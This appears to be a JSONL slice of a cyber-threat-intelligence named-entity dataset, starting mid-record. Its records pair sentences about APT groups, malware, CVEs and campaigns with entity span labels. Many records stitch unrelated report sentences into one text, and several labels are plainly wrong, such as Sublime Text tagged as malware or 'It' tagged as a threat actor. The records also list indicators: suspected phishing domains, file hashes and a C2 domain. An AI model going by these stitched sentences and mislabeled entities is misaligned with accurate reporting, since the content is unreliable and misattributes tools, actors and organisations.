"TOOL: webshells": [[1155, 1164]], "SYSTEM: Linux": [[1559, 1564]], "ORGANIZATION: financial": [[1597, 1606], [5187, 5196], [5979, 5988], [6158, 6167], [6477, 6486], [7136, 7145]], "ORGANIZATION: vulnerable servers": [[1670, 1688]], "MALWARE: Sublime Text": [[1790, 1802]], "MALWARE: Media application": [[1842, 1859]], "TOOL: DLL": [[1903, 1906]], "THREAT_ACTOR: It": [[1928, 1930]], "THREAT_ACTOR: group’s": [[2050, 2057], [7826, 7833]], "MALWARE: stealing tools": [[2118, 2132]], "MALWARE: document stealers": [[2165, 2182]], "MALWARE: EvilGnome": [[2287, 2296]], "THREAT_ACTOR: Gamaredon group": [[2350, 2365]], "THREAT_ACTOR: FIN7": [[2383, 2387], [2517, 2521], [2741, 2745], [2955, 2959], [3094, 3098], [3339, 3343], [4230, 4234], [4508, 4512], [5388, 5392], [5521, 5525], [5576, 5580], [5700, 5704], [5906, 5910], [6785, 6789], [7257, 7261]], "THREAT_ACTOR: attacker groups": [[2692, 2707]], "ORGANIZATION: Kaspersky": [[2807, 2816], [3958, 3967]], "ORGANIZATION: Lab’s Global Research and Analysis Team": [[2817, 2856]], "TOOL: email": [[3164, 3169], [4760, 4765], [8659, 8664]], "MALWARE: malicious Office document": [[3400, 3425]], "FILEPATH: GRIFFON": [[3538, 3545], [3713, 3720]], "THREAT_ACTOR: FIN7’s": [[3836, 3842], [4122, 4128]], "ORGANIZATION: security companies": [[3865, 3883]], "THREAT_ACTOR: activity cluster": [[3933, 3949]], "ORGANIZATION: banks": [[4046, 4051], [4159, 4164]], "ORGANIZATION: money processing": [[4084, 4100]], "MALWARE: backdoors": [[4248, 4257]], "MALWARE: CobaltStrike framework": [[4266, 4288]], "MALWARE: Powershell": [[4292, 4302], [6712, 6722]], "THREAT_ACTOR: AveMaria": [[4401, 4409]], "ORGANIZATION: Bank": [[4586, 4590]], "FILEPATH: AveMaria": [[4640, 4648]], "THREAT_ACTOR: They": [[4825, 4829]], "MALWARE: AutoIT droppers": [[4839, 4854]], "THREAT_ACTOR: cyber criminals": [[4939, 4954]], "MALWARE: spearphishing emails": [[4959, 4979]], "MALWARE: attachments:": [[5002, 5014]], "MALWARE: documents": [[5025, 5034], [5117, 5126]], "VULNERABILITY: CVE-2017-11882": [[5097, 5111]], "THREAT_ACTOR: actor": [[5172, 5177]], "THREAT_ACTOR: Cobalt": [[5530, 5536]], "ORGANIZATION: Digicert”": [[5742, 5751]], "MALWARE: command": [[5814, 5821]], "MALWARE: control server": [[5826, 5840]], "ORGANIZATION: various companies": [[5944, 5961]], "THREAT_ACTOR: CobaltGoblin": [[6036, 6048]], "THREAT_ACTOR: Carbanak": [[6049, 6057]], "THREAT_ACTOR: EmpireMonkey": [[6058, 6070]], "THREAT_ACTOR: groups": [[6312, 6318]], "MALWARE: similar toolkits": [[6330, 6346]], "MALWARE: infrastructure": [[6360, 6374]], "THREAT_ACTOR: CopyPaste": [[6446, 6455]], "ORGANIZATION: companies": [[6500, 6509]], "ORGANIZATION: training center": [[6615, 6630]], "THREAT_ACTOR: cluster": [[6658, 6665]], "MALWARE: CobaltStrike": [[6690, 6702]], "THREAT_ACTOR: MuddyWater": [[6925, 6935], [7032, 7042], [7449, 7459]], "ORGANIZATION: governments": [[7095, 7106]], "ORGANIZATION: educational institutions": [[7109, 7133]], "ORGANIZATION: telecommunications": [[7148, 7166]], "ORGANIZATION: defense": [[7171, 7178]], "SYSTEM: Android": [[7493, 7500], [7680, 7687]], "MALWARE: malware": [[7501, 7508], [7688, 7695]], "MALWARE: Multi-Stage Backdoors": [[7642, 7663]], "MALWARE: False Flags": [[7666, 7677]], "MALWARE: compromised legitimate accounts": [[7737, 7768]], "MALWARE: email": [[7841, 7846]], "THREAT_ACTOR: MuddyWater’s": [[7929, 7941]], "MALWARE: post-exploitation tools": [[7970, 7993]], "THREAT_ACTOR: attacker": [[8063, 8071]], "MALWARE: delivered payloads": [[8193, 8211]], "FILEPATH: Monitor RAT": [[8251, 8262]], "FILEPATH: LuminosityLink RAT": [[8330, 8348]], "FILEPATH: NetWire RAT": [[8351, 8362]], "FILEPATH: NjRAT": [[8369, 8374]], "FILEPATH: Warzone RAT": [[8418, 8429]], "FILEPATH: Xpert RAT": [[8443, 8452]], "FILEPATH: Proyecto RAT”": [[8510, 8523]], "THREAT_ACTOR: Scattered Canary": [[8602, 8618]]}, "info": {"id": "cyberner_stix_train_005226", "source": "cyberner_stix_train"}}
{"text": "Cannon runs the downloaded file from the specified path .", "spans": {"MALWARE: Cannon": [[0, 6]]}, "info": {"id": "cyberner_stix_train_005227", "source": "cyberner_stix_train"}}
{"text": "For example , the Ztorg Trojan has been uploaded to Google Play almost 100 times since September 2016 . Hackers used the remote access to detect servers of their interest in the internal network . An additional module written by the group called ScreenBooking is used to capture credit card data . # 147 : The dangers of \" Mercenary \" groups and the spyware they create Upcoming events where you can find Talos “ Most prevalent malware files ” is taking a break this week for maintenance .", "spans": {"MALWARE: Ztorg Trojan": [[18, 30]], "SYSTEM: Google Play": [[52, 63]], "MALWARE: ScreenBooking": [[246, 259]], "THREAT_ACTOR: Mercenary \" groups": [[323, 341]], "ORGANIZATION: Talos": [[405, 410]]}, "info": {"id": "cyberner_stix_train_005228", "source": "cyberner_stix_train"}}
{"text": "Lastly , the entire json object is encoded with Base64 and undergoes another stage of encryption , and then sent to the server :", "spans": {}, "info": {"id": "cyberner_stix_train_005229", "source": "cyberner_stix_train"}}
{"text": "] com w3.changeip [ . APT41 also deploys the SOGU and CROSSWALK malware families as means to maintain presence . In addition to the notably overt and large-scale campaigns with CozyDuke and CloudDuke , the Dukes also continued to engage in more covert , surgical campaigns using CosmicDuke .", "spans": {"THREAT_ACTOR: APT41": [[22, 27]], "TOOL: SOGU": [[45, 49]], "TOOL: CROSSWALK": [[54, 63]], "THREAT_ACTOR: Dukes": [[206, 211]], "MALWARE: CosmicDuke": [[279, 289]]}, "info": {"id": "cyberner_stix_train_005230", "source": "cyberner_stix_train"}}
{"text": "The next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials . Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor ( also known as EmissaryPanda and APT27 ) .", "spans": {"THREAT_ACTOR: actor": [[22, 27]], "TOOL: MitM servers": [[41, 53]], "THREAT_ACTOR: LuckyMouse": [[183, 193]], "THREAT_ACTOR: EmissaryPanda": [[233, 246]], "THREAT_ACTOR: APT27": [[251, 256]]}, "info": {"id": "cyberner_stix_train_005231", "source": "cyberner_stix_train"}}
{"text": "CTU researchers infer intent by aggregating observations , analyzing a threat group's activity , and placing the information in a wider context .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_005232", "source": "cyberner_stix_train"}}
{"text": "This software is free and distributed under LGPL license . No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" — a near-year-old Java security hole — \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported . In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown .", "spans": {"VULNERABILITY: zero-day vulnerabilities": [[62, 86]], "VULNERABILITY: CVE-2011-3544": [[183, 196]], "VULNERABILITY: CVE-2010-0738": [[244, 257]], "ORGANIZATION: Dell SecureWorks'": [[290, 307]], "THREAT_ACTOR: activity groups": [[370, 385]], "THREAT_ACTOR: PROMETHIUM": [[388, 398]], "THREAT_ACTOR: NEODYMIUM": [[403, 412]], "VULNERABILITY: zeroday": [[471, 478]], "VULNERABILITY: exploit": [[479, 486]]}, "info": {"id": "cyberner_stix_train_005233", "source": "cyberner_stix_train"}}
{"text": "Further analysis of the iOS app “ Concipit1248 ” showed that the server used , spy [ . A second group , which we call GCMAN because the malware is based on code compiled on the GCC compiler , emerged recently using similar techniques to the Metel Group to infect banking institutions and attempt to transfer money to e-currency services . in block number 7 but the edi value is assigned in block number 1 and 2 . As we ’ve already previously discussed in our 2017 predictions , these groups will constantly evolve and employ unique and advanced attack techniques .", "spans": {"THREAT_ACTOR: group": [[96, 101]], "THREAT_ACTOR: GCMAN": [[118, 123]], "THREAT_ACTOR: Metel Group": [[241, 252]], "ORGANIZATION: banking institutions": [[263, 283]]}, "info": {"id": "cyberner_stix_train_005234", "source": "cyberner_stix_train"}}
{"text": "Click fraud PHAs simulate user clicks on ads instead of simply displaying ads and waiting for users to click them . A report published by Kaspersky Labs in 2011 on NetTraveler also mentions the C2 servers were being hosted by Krypt Technolgies . The DPP is part of the pan-green coalition that favors Taiwanese independence over reunification with the mainland , and the party ’s victory would represent a shift away from the ruling Kuomintang ’s closer ties with the PRC . Chinese state - sponsored actors reportedly accessed email accounts belonging to several U.S.-based organizations and federal government agencies , including the State Department .", "spans": {"ORGANIZATION: Kaspersky Labs": [[138, 152]], "TOOL: NetTraveler": [[164, 175]], "ORGANIZATION: PRC": [[468, 471]], "THREAT_ACTOR: Chinese state - sponsored actors": [[474, 506]], "ORGANIZATION: U.S.-based organizations": [[563, 587]], "ORGANIZATION: federal government agencies": [[592, 619]], "ORGANIZATION: State Department": [[636, 652]]}, "info": {"id": "cyberner_stix_train_005235", "source": "cyberner_stix_train"}}
{"text": "Why you need the Bank Austria Security App : Due to outdated technology of the mobile network important data such as mTan SMS and online banking connections are transmitted unencrypted . Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs . The group conducted a campaign in May 2016 and has heavily targeted Turkish victims .", "spans": {"SYSTEM: Bank Austria Security App": [[17, 42]], "THREAT_ACTOR: attackers": [[248, 257]]}, "info": {"id": "cyberner_stix_train_005236", "source": "cyberner_stix_train"}}
{"text": "A very unique technique is being used to inject this Trojan into an Android system where an attacker places a component of it into the boot partition of the file system and modify the 'init ' script ( initialize the operating system ) to re-load the malware as you switch on your android . The decoy slideshows all contain photos from very meaningful events to individuals in Thailand , suggesting that the actors continually look for impactful events to use to disguise their attacks . The nature of “ Unit 61398 ’s ” work is considered by China to be a state secret ; however , we believe it engages in harmful “ Computer Network Operations. ” Unit 61398 is partially situated on Datong Road in Gaoqiaozhen , which is located in the Pudong New Area of Shanghai . According to HTTP headers of the server , the applet was uploaded on February 11 , 2013 , one month after the Metasploit code was published and two days before Oracle issued a security alert regarding the vulnerability .", "spans": {"SYSTEM: Android": [[68, 75]], "SYSTEM: android": [[280, 287]], "TOOL: decoy slideshows": [[294, 310]], "ORGANIZATION: Unit 61398": [[503, 513], [646, 656]], "SYSTEM: HTTP headers of the server": [[778, 804]], "ORGANIZATION: Oracle": [[925, 931]], "VULNERABILITY: vulnerability": [[970, 983]]}, "info": {"id": "cyberner_stix_train_005237", "source": "cyberner_stix_train"}}
{"text": "The recent activity X-Force IRIS is seeing from the Shamoon attackers has so far been detected in two waves , but those are likely to subside following the public attention the cases have garnered since late 2016 .", "spans": {"ORGANIZATION: X-Force IRIS": [[20, 32]]}, "info": {"id": "cyberner_stix_train_005238", "source": "cyberner_stix_train"}}
{"text": "Analysis of one of the threat actor ’s documents found that if the macro executes , it launches two separate PowerShell Scripts .", "spans": {"TOOL: PowerShell": [[109, 119]]}, "info": {"id": "cyberner_stix_train_005239", "source": "cyberner_stix_train"}}
{"text": "Some hackers even went onto use the Cisco exploits in the wild . Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware .", "spans": {"VULNERABILITY: Cisco exploits": [[36, 50]], "ORGANIZATION: Iranians": [[123, 131]]}, "info": {"id": "cyberner_stix_train_005240", "source": "cyberner_stix_train"}}
{"text": "Our eyes fell on the latest version of the Trojan , which is designed to steal money from owners of Android devices connected to the mobile banking service of one of Russia ’ s largest banks . To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts . As we ’ve observed with cybercriminal groups that aim to maximize profits for every campaign , silence does n’t necessarily mean inactivity . None LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": {"SYSTEM: Android": [[100, 107]], "ORGANIZATION: CTU": [[290, 293]], "MALWARE: cmd.exe": [[315, 322]], "TOOL: LIGHTWORK": [[546, 555]]}, "info": {"id": "cyberner_stix_train_005241", "source": "cyberner_stix_train"}}
{"text": "Finally , research yielded a relatively unique sample .", "spans": {}, "info": {"id": "cyberner_stix_train_005242", "source": "cyberner_stix_train"}}
{"text": "REQUEST_INSTALL_PACKAGES - make a request to install packages . ined in the archive is called DriverInstallerU.exe but its metadata shows that its original name is Interenet Assistant.exe . All of the Emissary we've collected are written in Traditional Chinese , which is used primarily in Taiwan and Hong Kong .", "spans": {"MALWARE: DriverInstallerU.exe": [[94, 114]], "MALWARE: Interenet Assistant.exe": [[164, 187]], "MALWARE: Emissary": [[201, 209]]}, "info": {"id": "cyberner_stix_train_005243", "source": "cyberner_stix_train"}}
{"text": "Geo-location . Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows . In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe .", "spans": {"VULNERABILITY: Microsoft Windows OLE Remote Code Execution Vulnerability": [[102, 159]], "VULNERABILITY: CVE-2014-6332": [[162, 175]], "THREAT_ACTOR: PROMETHIUM": [[260, 270]], "THREAT_ACTOR: NEODYMIUM": [[275, 284]], "ORGANIZATION: specific individuals": [[329, 349]]}, "info": {"id": "cyberner_stix_train_005244", "source": "cyberner_stix_train"}}
{"text": "If the mobile operator does n't enforce proper client isolation , it is possible that the infected devices are also exposed to the rest of the cellular network . While we know the attackers used a custom dropper to install the back door , we do not know the delivery vector . An .mp3 file of a song by the famous Syrian singer Asala Nasri ( song name : Fen Habibi , translation : “ where is my loved one? ” ) 4583b49086c7b88cf9d074597b1d65ff33730e1337aee2a87b8745e94539d964 . Since the beginning of 2023 , the majority of observed KillNet targeting has focused on the U.S. , Europe , and international institutions such as NATO .", "spans": {"TOOL: custom dropper": [[197, 211]], "FILEPATH: .mp3": [[279, 283]], "FILEPATH: 4583b49086c7b88cf9d074597b1d65ff33730e1337aee2a87b8745e94539d964": [[409, 473]]}, "info": {"id": "cyberner_stix_train_005245", "source": "cyberner_stix_train"}}
{"text": "] zqo-japan [ . After compromising a political organization , APT28 will steal internal data . The controller responds with the 253.25.42.87 A record . CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": {"ORGANIZATION: political organization": [[37, 59]], "THREAT_ACTOR: APT28": [[62, 67]], "IP_ADDRESS: 253.25.42.87": [[128, 140]], "ORGANIZATION: CrowdStrike incident responders": [[152, 183]], "THREAT_ACTOR: threat actor": [[393, 405]]}, "info": {"id": "cyberner_stix_train_005246", "source": "cyberner_stix_train"}}
{"text": "Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time . Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit .", "spans": {"MALWARE: CARBANAK": [[80, 88]], "VULNERABILITY: 0-day": [[250, 255]], "TOOL: Adobe Flash Player": [[258, 276]], "VULNERABILITY: exploit": [[277, 284]]}, "info": {"id": "cyberner_stix_train_005247", "source": "cyberner_stix_train"}}
{"text": "We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . Recently , Trend Micro researchers came across a new mobile malware family which we have called GnatSpy .", "spans": {"THREAT_ACTOR: groups": [[28, 34]], "ORGANIZATION: government": [[83, 93]], "ORGANIZATION: electric": [[107, 115]], "ORGANIZATION: Trend Micro": [[227, 238]], "MALWARE: GnatSpy": [[312, 319]]}, "info": {"id": "cyberner_stix_train_005248", "source": "cyberner_stix_train"}}
{"text": "In this case , however , the hacktool had an unusual characteristic not typically seen with this type of file ; it was signed with a valid code-signing certificate .", "spans": {}, "info": {"id": "cyberner_stix_train_005249", "source": "cyberner_stix_train"}}
{"text": "The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in , or preparing to invest in , the country . Since last week , iSIGHT Partners has worked to provide details on the power outage in Ukraine to our global customers .", "spans": {"THREAT_ACTOR: APT32": [[45, 50]], "ORGANIZATION: FireEye": [[66, 73]], "ORGANIZATION: business": [[135, 143]], "ORGANIZATION: iSIGHT Partners": [[209, 224]], "ORGANIZATION: customers": [[300, 309]]}, "info": {"id": "cyberner_stix_train_005250", "source": "cyberner_stix_train"}}
{"text": "'' This DLL contains one root class called \" eClient , '' which is the core of the trojan . Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017 , which shows that even nine years after its creation , attackers are using China Chopper without significant modifications . The Elfin espionage group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries .", "spans": {"ORGANIZATION: Cisco Talos": [[92, 103]], "TOOL: China Chopper": [[127, 140], [272, 285]], "THREAT_ACTOR: attackers": [[252, 261]], "THREAT_ACTOR: Elfin": [[326, 331]], "THREAT_ACTOR: APT33": [[354, 359]]}, "info": {"id": "cyberner_stix_train_005251", "source": "cyberner_stix_train"}}
{"text": "He posted a tweet to The New York Times report , sarcastically writing , \" If only two people had called this company out for their backdoors several times over the last few years . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . Gh0stRAt Downloader : e34f4a9c598ad3bb243cb39969fb9509427ff9c08e63e8811ad26b72af046f0c .", "spans": {"ORGANIZATION: New York Times": [[25, 39]], "MALWARE: sample": [[328, 334]], "VULNERABILITY: CVE-2017-11882": [[354, 368]], "VULNERABILITY: CVE-2018-0802": [[372, 385]], "MALWARE: Gh0stRAt Downloader": [[388, 407]], "FILEPATH: e34f4a9c598ad3bb243cb39969fb9509427ff9c08e63e8811ad26b72af046f0c": [[410, 474]]}, "info": {"id": "cyberner_stix_train_005252", "source": "cyberner_stix_train"}}
{"text": "Given this , and the naming convention of the submissions ( .virus ) , the submitter hash most likely belongs to an AV vendor or sandboxing environment that automatically submits samples to online malware databases . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B . ClearSky 's September 2014 blog post first described active attacks using a piece of malware they dubbed ' Gholee ' ( as appears in a malicious payload export function , potentially named after a popular Iranian singer9 ) .", "spans": {"MALWARE: XAgent": [[231, 237]], "MALWARE: IOS_XAGENT.A": [[250, 262]], "MALWARE: MadCap": [[322, 328]], "MALWARE: XAGENT.B": [[346, 354]], "ORGANIZATION: ClearSky": [[357, 365]], "MALWARE: Gholee": [[464, 470]]}, "info": {"id": "cyberner_stix_train_005253", "source": "cyberner_stix_train"}}
{"text": "] netupload404 [ . Unit 42 published a blog at the beginning of May titled \" Prince of Persia \" , in which we described the discovery of a decade-long campaign using a formerly unknown malware family , Infy , that targeted government and industry interests worldwide . However , we have evidence to suggest that APT1 is running hundreds , and likely thousands , of other servers ( see the Domains section below ) . Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation , such as through the use of virtualization technology.[4 ] Bundlore uses the mktemp utility to make unique file and directory names for payloads , such as TMP_DIR=`mktemp", "spans": {"ORGANIZATION: Unit 42": [[19, 26]], "TOOL: Infy": [[202, 206]], "ORGANIZATION: government": [[223, 233]], "ORGANIZATION: industry": [[238, 246]], "THREAT_ACTOR: APT1": [[312, 316]], "THREAT_ACTOR: Adversaries": [[415, 426]], "MALWARE: Bundlore": [[642, 650]], "TOOL: mktemp utility": [[660, 674]]}, "info": {"id": "cyberner_stix_train_005254", "source": "cyberner_stix_train"}}
{"text": "We identified a malware testing environment that we assess with high confidence was used to refine some TEMP.Veles tools .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[104, 114]]}, "info": {"id": "cyberner_stix_train_005255", "source": "cyberner_stix_train"}}
{"text": "NTDS.dit contains Active Directory data , including password hashes for all users on a domain .", "spans": {"FILEPATH: NTDS.dit": [[0, 8]], "TOOL: Active Directory": [[18, 34]]}, "info": {"id": "cyberner_stix_train_005256", "source": "cyberner_stix_train"}}
{"text": "The string of comma separated hexadecimal values is passed as a parameter when loading the SWF file downloaded in ‘ onload2 ’ .", "spans": {"TOOL: SWF": [[91, 94]]}, "info": {"id": "cyberner_stix_train_005257", "source": "cyberner_stix_train"}}
{"text": "Most samples of the malware reportedly function as a basic reconnaissance tool and downloader .", "spans": {}, "info": {"id": "cyberner_stix_train_005258", "source": "cyberner_stix_train"}}
{"text": "It was implemented by sending an SMS message containing a one-time password ( OTP ) to the client ’ s mobile device . The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . ] com , which we previously identified in October 2017 to be an OilRig C2 .", "spans": {"THREAT_ACTOR: group": [[122, 127]], "TOOL: legitimate administration tools": [[133, 164]], "THREAT_ACTOR: OilRig": [[375, 381]], "TOOL: C2": [[382, 384]]}, "info": {"id": "cyberner_stix_train_005259", "source": "cyberner_stix_train"}}
{"text": "This version has some small modifications which seems to be unused , as the malware behaviour is the same as the previous version . The backdoor was deployed using the Notepad++ updater and sideloading malicious DLL , as noted in APT10’s targeting of Japanese corporations in July 2018 . These threats shared infrastructure between July 2012 and April 2013 .", "spans": {"THREAT_ACTOR: APT10’s": [[230, 237]], "ORGANIZATION: Japanese corporations": [[251, 272]]}, "info": {"id": "cyberner_stix_train_005260", "source": "cyberner_stix_train"}}
{"text": "The system service ‘ AccountManagerService ’ looks for the application that can process this request . \" Buhgalter \" means \" accountant \" in Russian . The files are given new , random names , which are generated by concatenating words and numbers based on the time of execution ( for example , C:\\Users\\<user>\\Favorites\\\\Res.Center.ponse\\<numbers> ) . Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": {"ORGANIZATION: WordPress appears to be the top target": [[375, 413]]}, "info": {"id": "cyberner_stix_train_005261", "source": "cyberner_stix_train"}}
{"text": "The indicators associated with the blog article are available in the ThreatConnect Technical Blogs and Reports source here .", "spans": {"ORGANIZATION: ThreatConnect": [[69, 82]]}, "info": {"id": "cyberner_stix_train_005262", "source": "cyberner_stix_train"}}
{"text": "We observe similar keyboard patterns in other samples : “ 567%^& ” , “ zxc!@#ASD ” .", "spans": {}, "info": {"id": "cyberner_stix_train_005263", "source": "cyberner_stix_train"}}
{"text": "Once in a while , it sends a packet to its C & C server containing the collected device data along with all the saved SMS messages . LATINUM makes a concerted effort to hide their infection tracks , by self-deleting malicious components , or by using server side logic in ' one shot mode ' where remotely hosted malicious components are only allowed to load once . The email had no subject and what initially drew our attention to OilRig 's attack was the content of the spear phishing email .", "spans": {"THREAT_ACTOR: LATINUM": [[133, 140]], "TOOL: self-deleting malicious components": [[202, 236]], "TOOL: server side logic": [[251, 268]], "THREAT_ACTOR: OilRig": [[431, 437]]}, "info": {"id": "cyberner_stix_train_005264", "source": "cyberner_stix_train"}}
{"text": "In a case in June 2019 , we also noticed Warzone RAT being used . According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file .", "spans": {"MALWARE: Warzone RAT": [[41, 52]], "ORGANIZATION: Deepen": [[79, 85]], "THREAT_ACTOR: APT6": [[88, 92]], "MALWARE: PDF": [[148, 151]], "MALWARE: ZIP": [[156, 159]], "FILEPATH: SCR file": [[236, 244]]}, "info": {"id": "cyberner_stix_train_005265", "source": "cyberner_stix_train"}}
{"text": "And TikTok is no exception . The initial infection vector used by the threat actor also changed over time , during 2018 we have seen multiple uses of self-extracting archives instead of malicious documents with AutoHotKey , which displayed a decoy image to the user . Ids.me .", "spans": {"SYSTEM: TikTok": [[4, 10]], "TOOL: archives": [[166, 174]], "THREAT_ACTOR: AutoHotKey": [[211, 221]], "TOOL: decoy image": [[242, 253]], "DOMAIN: Ids.me": [[268, 274]]}, "info": {"id": "cyberner_stix_train_005266", "source": "cyberner_stix_train"}}
{"text": "TOOLS AND TECHNIQUES OF THE DUKES .", "spans": {"THREAT_ACTOR: DUKES": [[28, 33]]}, "info": {"id": "cyberner_stix_train_005267", "source": "cyberner_stix_train"}}
{"text": "Download additional payloads .", "spans": {}, "info": {"id": "cyberner_stix_train_005268", "source": "cyberner_stix_train"}}
{"text": "As the pattern of chemical industry targets emerged , we internally code-named the attack campaign Nitro .", "spans": {"THREAT_ACTOR: Nitro": [[99, 104]]}, "info": {"id": "cyberner_stix_train_005269", "source": "cyberner_stix_train"}}
{"text": "myyoula.ru sell-avito.ru sell-youla.ru sentel8ju67.com subito-li.pw subitop.pw web-gumtree.com whitehousejosh.com whitekalgoy3.com youlaprotect.ru Examples of malware 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa Trend Micro also reported MuddyWater’s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3 . In this campaign , the malware author uses the following name: Pyongyang Directory Group email April 2017 RC_Office_Coordination_Associate.scr. The decoy document shown after infection is an Office document containing email addresses , phone numbers and contacts of members of official organizations such as the United Nations , UNICEF , Embassies linked to North Korea .", "spans": {"ORGANIZATION: Trend Micro": [[297, 308]], "THREAT_ACTOR: MuddyWater’s": [[323, 335]], "MALWARE: POWERSTATS v3": [[394, 407]], "FILEPATH: RC_Office_Coordination_Associate.scr.": [[516, 553]], "TOOL: Office": [[601, 607]], "TOOL: email": [[628, 633]], "ORGANIZATION: official organizations": [[687, 709]], "ORGANIZATION: United Nations": [[722, 736]], "ORGANIZATION: UNICEF": [[739, 745]], "ORGANIZATION: Embassies": [[748, 757]]}, "info": {"id": "cyberner_stix_train_005270", "source": "cyberner_stix_train"}}
{"text": "This file discusses the supposed announcement banning the rival Fatah political party , which controls the West Bank , from Gaza .", "spans": {"ORGANIZATION: Fatah": [[64, 69]]}, "info": {"id": "cyberner_stix_train_005271", "source": "cyberner_stix_train"}}
{"text": "When a victim tries to access the URL in the SMS body , the C2 will check if the mobile device meets the criteria to receive the malware ( see infrastructure section ) . APT10 withdrew from direct targeting using Poison Ivy in 2013 and conducted its first known retooling operation , upgrading its capabilities and replatforming to use PlugX . OceanLotus : background.ristians.com:8888 11b4 . They contain some invalid URLs and IPs .", "spans": {"THREAT_ACTOR: APT10": [[170, 175]], "TOOL: Poison Ivy": [[213, 223]], "TOOL: PlugX": [[336, 341]], "THREAT_ACTOR: OceanLotus": [[344, 354]], "DOMAIN: background.ristians.com:8888": [[357, 385]]}, "info": {"id": "cyberner_stix_train_005272", "source": "cyberner_stix_train"}}
{"text": "CTU researchers found no evidence of multiple operators working simultaneously against a single organization .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_005273", "source": "cyberner_stix_train"}}
{"text": "URL Status IP Domain registration date http : //ora.studiolegalebasili [ . As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload . FireEye 's publication of \" Operation Saffron Rose \" report , which described Flying Kitten 's operations against aviation firms , led to the dismantling of Flying Kitten 's infrastructure and the apparent end of its activities .", "spans": {"ORGANIZATION: Proofpoint": [[78, 88]], "MALWARE: MSIL payload": [[220, 232]], "ORGANIZATION: FireEye": [[235, 242]], "THREAT_ACTOR: Flying Kitten": [[313, 326], [392, 405]], "ORGANIZATION: aviation firms": [[349, 363]]}, "info": {"id": "cyberner_stix_train_005274", "source": "cyberner_stix_train"}}
{"text": "Windows Defender ATP provides extensive information about activity groups responsible for the attacks , enabling customers to understand aspects of the attack that may not be obtained by network and endpoint sensors , such as common social engineering lures and the regional nature of an attack .", "spans": {"TOOL: Windows Defender ATP": [[0, 20]]}, "info": {"id": "cyberner_stix_train_005275", "source": "cyberner_stix_train"}}
{"text": "String Resources Used to Store App Data Red Alert 2.0 stores its data in an atypical location ( inside the Strings.xml file embedded in the app ) to fetch its critical data , such as the C2 address . However , we asses with medium confidence that NavRAT is linked to Group123 . was applied to APT10 ANEL and Dharma ransomware packer . Another area where we may want to consider this motivation is the human factor .", "spans": {"MALWARE: Red Alert 2.0": [[40, 53]], "TOOL: NavRAT": [[247, 253]], "THREAT_ACTOR: Group123": [[267, 275]], "THREAT_ACTOR: APT10": [[293, 298]], "MALWARE: ANEL": [[299, 303]], "MALWARE: Dharma": [[308, 314]]}, "info": {"id": "cyberner_stix_train_005276", "source": "cyberner_stix_train"}}
{"text": "While both RTM and Buhtrap are looking for a quite similar process list , the infection vectors are quite different . Based on analysis of the data and malware samples we have collected , Unit 42 believes the attacks described herein are the work of a group or set of cooperating groups who have a single mission , collecting information on minority groups who reside in and around northwestern China .", "spans": {"TOOL: RTM": [[11, 14]], "TOOL: Buhtrap": [[19, 26]], "ORGANIZATION: Unit 42": [[188, 195]], "THREAT_ACTOR: groups": [[280, 286]], "ORGANIZATION: minority groups": [[341, 356]]}, "info": {"id": "cyberner_stix_train_005277", "source": "cyberner_stix_train"}}
